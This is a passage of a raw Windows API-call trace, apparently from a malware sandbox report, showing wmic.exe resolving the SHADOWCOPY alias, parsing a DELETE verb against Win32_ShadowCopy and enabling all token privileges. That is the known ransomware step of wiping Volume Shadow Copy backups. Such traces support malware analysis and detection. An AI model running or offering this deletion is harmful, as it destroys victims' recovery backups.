ppNamespace=0xa68540*=0x2e8afa0) returned 0x0 [0254.126] free (_Block=0x2bbab00) [0254.126] free (_Block=0x2bbaae8) [0254.126] CoSetProxyBlanket (pProxy=0x2e8afa0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0254.126] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.127] GetCurrentThreadId () returned 0x1298 [0254.127] ??0CHString@@QAE@XZ () returned 0x87f740 [0254.127] malloc (_Size=0xc) returned 0x2bbab60 [0254.127] malloc (_Size=0xc) returned 0x2bbaae8 [0254.127] malloc (_Size=0xc) returned 0x2bbab00 [0254.127] malloc (_Size=0xc) returned 0x2bbab30 [0254.127] SysStringLen (param_1="root\\cli") returned 0x8 [0254.127] SysStringLen (param_1="\\") returned 0x1 [0254.127] malloc (_Size=0xc) returned 0x2bbae30 [0254.127] SysStringLen (param_1="root\\cli\\") returned 0x9 [0254.127] SysStringLen (param_1="ms_409") returned 0x6 [0254.127] free (_Block=0x2bbab30) [0254.127] free (_Block=0x2bbab00) [0254.127] free (_Block=0x2bbaae8) [0254.127] free (_Block=0x2bbab60) [0254.127] malloc (_Size=0xc) returned 0x2bbaae8 [0254.127] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2e84840, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68544 | out: ppNamespace=0xa68544*=0x2eb7fb0) returned 0x0 [0254.220] free (_Block=0x2bbaae8) [0254.220] free (_Block=0x2bbae30) [0254.220] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.220] GetCurrentThreadId () returned 0x1298 [0254.220] ??0CHString@@QAE@XZ () returned 0x87f79c [0254.220] malloc (_Size=0xc) returned 0x2bbada0 [0254.220] malloc (_Size=0xc) returned 0x2bbadb8 [0254.220] malloc (_Size=0xc) returned 0x2bbae00 [0254.220] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0254.220] malloc (_Size=0x3a) returned 0x2bbb6e0 [0254.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa214a8, cbMultiByte=-1, lpWideCharStr=0x2bbb6e0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0254.220] free (_Block=0x2bbb6e0) [0254.220] malloc (_Size=0xc) returned 0x2bbadd0 [0254.220] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0254.220] SysStringLen (param_1="SHADOWCOPY") returned 0xa [0254.220] malloc (_Size=0xc) returned 0x2bbae18 [0254.220] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SHADOWCOPY") returned 0x26 [0254.220] SysStringLen (param_1="'") returned 0x1 [0254.221] free (_Block=0x2bbadd0) [0254.221] free (_Block=0x2bbae00) [0254.221] free (_Block=0x2bbadb8) [0254.221] free (_Block=0x2bbada0) [0254.221] IWbemServices:GetObject (in: This=0x2e8afa0, strObjectPath="MSFT_CliAlias.FriendlyName='SHADOWCOPY'", lFlags=0, pCtx=0x0, ppObject=0x87f798*=0x0, ppCallResult=0x0 | out: ppObject=0x87f798*=0x2ec5450, ppCallResult=0x0) returned 0x0 [0254.265] malloc (_Size=0xc) returned 0x2bbae48 [0254.265] IWbemClassObject:Get (in: This=0x2ec5450, wszName="Target", lFlags=0, pVal=0x87f770*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f770*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.266] free (_Block=0x2bbae48) [0254.266] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0254.266] malloc (_Size=0x3e) returned 0x2bbb6e0 [0254.266] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0254.266] malloc (_Size=0xc) returned 0x2bbae30 [0254.266] IWbemClassObject:Get (in: This=0x2ec5450, wszName="PWhere", lFlags=0, pVal=0x87f770*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f770*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.266] free (_Block=0x2bbae30) [0254.266] lstrlenW (lpString=" Where ID = '#'") returned 15 [0254.266] malloc (_Size=0x20) returned 0x2bbb728 [0254.266] lstrlenW (lpString=" Where ID = '#'") returned 15 [0254.266] malloc (_Size=0xc) returned 0x2bbae00 [0254.266] IWbemClassObject:Get (in: This=0x2ec5450, wszName="Connection", lFlags=0, pVal=0x87f770*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f770*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec55e8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.267] free (_Block=0x2bbae00) [0254.267] IUnknown:QueryInterface (in: This=0x2ec55e8, riid=0xa26a04*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x87f78c | out: ppvObject=0x87f78c*=0x2ec55e8) returned 0x0 [0254.267] GetCurrentThreadId () returned 0x1298 [0254.267] ??0CHString@@QAE@XZ () returned 0x87f708 [0254.267] malloc (_Size=0xc) returned 0x2bbae30 [0254.267] IWbemClassObject:Get (in: This=0x2ec55e8, wszName="Namespace", lFlags=0, pVal=0x87f6f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f6f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.267] free (_Block=0x2bbae30) [0254.267] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0254.267] malloc (_Size=0x16) returned 0x2bb2ba8 [0254.267] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0254.267] malloc (_Size=0xc) returned 0x2bbada0 [0254.267] IWbemClassObject:Get (in: This=0x2ec55e8, wszName="Locale", lFlags=0, pVal=0x87f6f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2eaebc4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f6f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.267] free (_Block=0x2bbada0) [0254.267] lstrlenW (lpString="ms_409") returned 6 [0254.267] malloc (_Size=0xe) returned 0x2bbade8 [0254.267] lstrlenW (lpString="ms_409") returned 6 [0254.267] malloc (_Size=0xc) returned 0x2bbad88 [0254.267] IWbemClassObject:Get (in: This=0x2ec55e8, wszName="User", lFlags=0, pVal=0x87f6f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2eaebc4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f6f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.267] free (_Block=0x2bbad88) [0254.267] malloc (_Size=0xc) returned 0x2bbae00 [0254.268] IWbemClassObject:Get (in: This=0x2ec55e8, wszName="Password", lFlags=0, pVal=0x87f6f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f6f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.268] free (_Block=0x2bbae00) [0254.268] malloc (_Size=0xc) returned 0x2bbadb8 [0254.268] IWbemClassObject:Get (in: This=0x2ec55e8, wszName="Server", lFlags=0, pVal=0x87f6f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f6f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.268] free (_Block=0x2bbadb8) [0254.268] lstrlenW (lpString=".") returned 1 [0254.268] malloc (_Size=0x4) returned 0x2bbb750 [0254.268] lstrlenW (lpString=".") returned 1 [0254.268] malloc (_Size=0xc) returned 0x2bbad88 [0254.268] IWbemClassObject:Get (in: This=0x2ec55e8, wszName="Authority", lFlags=0, pVal=0x87f6f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2eaebc4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f6f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.268] free (_Block=0x2bbad88) [0254.268] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.268] IUnknown:Release (This=0x2ec55e8) returned 0x1 [0254.268] GetCurrentThreadId () returned 0x1298 [0254.268] ??0CHString@@QAE@XZ () returned 0x87f6fc [0254.268] malloc (_Size=0xc) returned 0x2bbae30 [0254.268] IWbemClassObject:Get (in: This=0x2ec5450, wszName="__RELPATH", lFlags=0, pVal=0x87f6e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f6e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.268] free (_Block=0x2bbae30) [0254.268] malloc (_Size=0xc) returned 0x2bbae48 [0254.269] GetCurrentThreadId () returned 0x1298 [0254.269] ??0CHString@@QAE@XZ () returned 0x87f678 [0254.269] ??0CHString@@QAE@PBG@Z () returned 0x87f66c [0254.269] ??0CHString@@QAE@ABV0@@Z () returned 0x87f5f4 [0254.269] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0254.269] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x2bbb760 [0254.269] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0254.269] ?Left@CHString@@QBE?AV1@H@Z () returned 0x87f5ec [0254.269] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x87f5f0 [0254.269] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x87f66c [0254.269] ??1CHString@@QAE@XZ () returned 0x1 [0254.269] ??1CHString@@QAE@XZ () returned 0x1 [0254.269] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x87f5e8 [0254.269] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x87f5f4 [0254.269] ??1CHString@@QAE@XZ () returned 0x1 [0254.269] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x2bbb7c8 [0254.269] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0254.269] ?Left@CHString@@QBE?AV1@H@Z () returned 0x87f5ec [0254.269] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x87f5f0 [0254.269] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x87f66c [0254.269] ??1CHString@@QAE@XZ () returned 0x1 [0254.269] ??1CHString@@QAE@XZ () returned 0x1 [0254.269] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x87f5e8 [0254.269] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x87f5f4 [0254.269] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.269] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6d7c65ec [0254.269] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.269] malloc (_Size=0xc) returned 0x2bbad88 [0254.269] malloc (_Size=0xc) returned 0x2bbada0 [0254.269] malloc (_Size=0xc) returned 0x2bbae00 [0254.269] malloc (_Size=0xc) returned 0x2bbadb8 [0254.270] malloc (_Size=0xc) returned 0x2bbae30 [0254.270] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0254.270] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0254.270] malloc (_Size=0xc) returned 0x2bbadd0 [0254.270] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0254.270] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0254.270] malloc (_Size=0xc) returned 0x2bbaae8 [0254.270] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0254.270] SysStringLen (param_1="\"") returned 0x1 [0254.270] free (_Block=0x2bbadd0) [0254.270] free (_Block=0x2bbae30) [0254.270] free (_Block=0x2bbadb8) [0254.270] free (_Block=0x2bbae00) [0254.270] free (_Block=0x2bbada0) [0254.270] free (_Block=0x2bbad88) [0254.270] IWbemServices:GetObject (in: This=0x2eb7fb0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x87f688*=0x0, ppCallResult=0x0 | out: ppObject=0x87f688*=0x2ec5b48, ppCallResult=0x0) returned 0x0 [0254.282] malloc (_Size=0xc) returned 0x2bbad88 [0254.282] IWbemClassObject:Get (in: This=0x2ec5b48, wszName="Text", lFlags=0, pVal=0x87f650*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x87f650*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec6470*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x2e8bba0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0254.282] free (_Block=0x2bbad88) [0254.282] SafeArrayGetLBound (in: psa=0x2ec6470, nDim=0x1, plLbound=0x87f664 | out: plLbound=0x87f664) returned 0x0 [0254.282] SafeArrayGetUBound (in: psa=0x2ec6470, nDim=0x1, plUbound=0x87f660 | out: plUbound=0x87f660) returned 0x0 [0254.282] SafeArrayGetElement (in: psa=0x2ec6470, rgIndices=0x87f67c, pv=0x87f674 | out: pv=0x87f674) returned 0x0 [0254.282] malloc (_Size=0xc) returned 0x2bbae30 [0254.282] malloc (_Size=0xc) returned 0x2bbad88 [0254.282] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0254.282] free (_Block=0x2bbae30) [0254.283] IUnknown:Release (This=0x2ec5b48) returned 0x0 [0254.283] free (_Block=0x2bbaae8) [0254.283] ??1CHString@@QAE@XZ () returned 0x1 [0254.283] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.283] free (_Block=0x2bbae48) [0254.283] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.283] lstrlenW (lpString="Shadow copy management.") returned 23 [0254.283] malloc (_Size=0x30) returned 0x2bbb760 [0254.283] lstrlenW (lpString="Shadow copy management.") returned 23 [0254.283] free (_Block=0x2bbad88) [0254.283] IUnknown:Release (This=0x2ec5450) returned 0x0 [0254.283] free (_Block=0x2bbae18) [0254.283] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.283] lstrlenW (lpString="PATH") returned 4 [0254.283] lstrlenW (lpString="DELETE") returned 6 [0254.283] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0254.283] lstrlenW (lpString="WHERE") returned 5 [0254.283] lstrlenW (lpString="DELETE") returned 6 [0254.283] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0254.283] lstrlenW (lpString="(") returned 1 [0254.283] lstrlenW (lpString="DELETE") returned 6 [0254.283] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0254.283] lstrlenW (lpString="/") returned 1 [0254.283] lstrlenW (lpString="DELETE") returned 6 [0254.283] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0254.283] lstrlenW (lpString="-") returned 1 [0254.283] lstrlenW (lpString="DELETE") returned 6 [0254.283] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0254.283] malloc (_Size=0xc) returned 0x2bbae48 [0254.284] lstrlenW (lpString="GET") returned 3 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0254.284] lstrlenW (lpString="LIST") returned 4 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0254.284] lstrlenW (lpString="SET") returned 3 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0254.284] lstrlenW (lpString="CREATE") returned 6 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0254.284] lstrlenW (lpString="CALL") returned 4 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0254.284] lstrlenW (lpString="ASSOC") returned 5 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0254.284] free (_Block=0x2bbae48) [0254.284] lstrlenW (lpString="/") returned 1 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0254.284] lstrlenW (lpString="-") returned 1 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] malloc (_Size=0xe) returned 0x2bbae00 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] lstrlenW (lpString="GET") returned 3 [0254.284] lstrlenW (lpString="DELETE") returned 6 [0254.284] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0254.285] lstrlenW (lpString="LIST") returned 4 [0254.285] lstrlenW (lpString="DELETE") returned 6 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0254.285] lstrlenW (lpString="SET") returned 3 [0254.285] lstrlenW (lpString="DELETE") returned 6 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0254.285] lstrlenW (lpString="CREATE") returned 6 [0254.285] lstrlenW (lpString="DELETE") returned 6 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0254.285] lstrlenW (lpString="CALL") returned 4 [0254.285] lstrlenW (lpString="DELETE") returned 6 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0254.285] lstrlenW (lpString="ASSOC") returned 5 [0254.285] lstrlenW (lpString="DELETE") returned 6 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0254.285] lstrlenW (lpString="DELETE") returned 6 [0254.285] lstrlenW (lpString="DELETE") returned 6 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0254.285] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0254.285] malloc (_Size=0x3e) returned 0x2bbb798 [0254.285] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0254.285] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xd37e1a78 | out: _String="Select", _Context=0xd37e1a78) returned="Select" [0254.285] malloc (_Size=0xc) returned 0x2bbad88 [0254.285] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd37e1a78 | out: _String=0x0, _Context=0xd37e1a78) returned="*" [0254.285] lstrlenW (lpString="FROM") returned 4 [0254.285] lstrlenW (lpString="*") returned 1 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0254.285] malloc (_Size=0xc) returned 0x2bbada0 [0254.285] free (_Block=0x2bbad88) [0254.285] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd37e1a78 | out: _String=0x0, _Context=0xd37e1a78) returned="from" [0254.285] lstrlenW (lpString="FROM") returned 4 [0254.285] lstrlenW (lpString="from") returned 4 [0254.285] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0254.286] malloc (_Size=0xc) returned 0x2bbae48 [0254.286] free (_Block=0x2bbada0) [0254.286] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd37e1a78 | out: _String=0x0, _Context=0xd37e1a78) returned="Win32_ShadowCopy" [0254.286] malloc (_Size=0xc) returned 0x2bbad88 [0254.286] free (_Block=0x2bbae48) [0254.286] free (_Block=0x2bbb798) [0254.286] free (_Block=0x2bbad88) [0254.286] lstrlenW (lpString="SET") returned 3 [0254.286] lstrlenW (lpString="DELETE") returned 6 [0254.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0254.286] lstrlenW (lpString="CREATE") returned 6 [0254.286] lstrlenW (lpString="DELETE") returned 6 [0254.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0254.286] free (_Block=0x2bb0598) [0254.286] malloc (_Size=0x4) returned 0x2bb0598 [0254.286] lstrlenW (lpString="GET") returned 3 [0254.286] lstrlenW (lpString="DELETE") returned 6 [0254.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0254.286] lstrlenW (lpString="LIST") returned 4 [0254.286] lstrlenW (lpString="DELETE") returned 6 [0254.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0254.286] lstrlenW (lpString="ASSOC") returned 5 [0254.286] lstrlenW (lpString="DELETE") returned 6 [0254.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0254.286] WbemLocator:IUnknown:AddRef (This=0x2e84840) returned 0x3 [0254.286] free (_Block=0x2bb2720) [0254.286] lstrlenW (lpString="") returned 0 [0254.286] lstrlenW (lpString="NQDPDE") returned 6 [0254.286] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0254.286] lstrlenW (lpString="NQDPDE") returned 6 [0254.286] malloc (_Size=0xe) returned 0x2bbad88 [0254.286] lstrlenW (lpString="NQDPDE") returned 6 [0254.287] GetCurrentThreadId () returned 0x1298 [0254.287] GetCurrentProcess () returned 0xffffffff [0254.287] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x87f808 | out: TokenHandle=0x87f808*=0x2fc) returned 1 [0254.287] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x87f804 | out: TokenInformation=0x0, ReturnLength=0x87f804) returned 0 [0254.287] malloc (_Size=0x118) returned 0x2bbb798 [0254.287] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x3, TokenInformation=0x2bbb798, TokenInformationLength=0x118, ReturnLength=0x87f804 | out: TokenInformation=0x2bbb798, ReturnLength=0x87f804) returned 1 [0254.287] AdjustTokenPrivileges (in: TokenHandle=0x2fc, DisableAllPrivileges=0, NewState=0x2bbb798*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0254.287] free (_Block=0x2bbb798) [0254.287] CloseHandle (hObject=0x2fc) returned 1 [0254.287] lstrlenW (lpString="GET") returned 3 [0254.287] lstrlenW (lpString="DELETE") returned 6 [0254.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0254.287] lstrlenW (lpString="LIST") returned 4 [0254.287] lstrlenW (lpString="DELETE") returned 6 [0254.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0254.287] lstrlenW (lpString="SET") returned 3 [0254.287] lstrlenW (lpString="DELETE") returned 6 [0254.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0254.287] lstrlenW (lpString="CALL") returned 4 [0254.287] lstrlenW (lpString="DELETE") returned 6 [0254.287] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0254.287] lstrlenW (lpString="ASSOC") returned 5 [0254.287] lstrlenW (lpString="DELETE") returned 6 [0254.288] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0254.288] lstrlenW 